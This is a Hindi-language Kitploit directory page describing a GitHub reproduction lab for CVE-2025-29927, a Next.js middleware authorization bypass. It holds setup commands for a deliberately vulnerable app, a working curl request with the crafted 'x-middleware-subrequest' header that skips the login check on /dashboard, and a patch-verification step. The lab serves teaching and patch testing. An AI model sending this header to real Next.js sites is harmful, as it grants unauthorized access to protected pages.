Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-29927-lab — CVE-2025-29927 के लिए रिप्रोडक्शन लैब — Next.js मिडलवेयर प्राधिकरण बाईपास (CVSS 9.1) | Kitploit
उपकरण/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

CVE-2025-29927 के लिए रिप्रोडक्शन लैब — Next.js मिडलवेयर प्राधिकरण बाईपास (CVSS 9.1)

रिपॉजिटरी देखें
503 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927 लैब

CVE-2025-29927 के लिए न्यूनतम पुनरुत्पादन लैब — Next.js मिडलवेयर प्राधिकरण बायपास (CVSS 9.1)।

संबंधित लेख: Medium पर N-Day विश्लेषण लेख

यह क्या है

एक Next.js 15.2.2 ऐप (असुरक्षित) जिसमें कुकी द्वारा नियंत्रित /dashboard रूट है। एक एकल HTTP हैडर भेजकर मिडलवेयर प्रमाणीकरण जांच को बायपास किया जा सकता है — किसी क्रेडेंशियल की आवश्यकता नहीं है।

आवश्यकताएँ

  • Node.js 18+

सेटअप

git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

बायपास दोहराएँ

चरण 1 — पुष्टि करें कि मिडलवेयर बिना प्रमाणीकरण वाले अनुरोधों को ब्लॉक करता है:

curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

चरण 2 — सबरिक्वेस्ट हैडर से मिडलवेयर को बायपास करें:

curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

चरण 3 — पैच किए गए संस्करण में अपग्रेड करें और पुष्टि करें कि बायपास ब्लॉक हो गया है:

npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307

ऐप रूट्स

रूटएक्सेस
/सार्वजनिक
/loginसार्वजनिक
/dashboardमिडलवेयर द्वारा सुरक्षित (session कुकी आवश्यक है)

प्रभावित संस्करण

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

संदर्भ

  • NVD — CVE-2025-29927
  • Next.js पैच PR #77201
  • असुरक्षित स्रोत — sandbox.ts
टूल डाउनलोड करें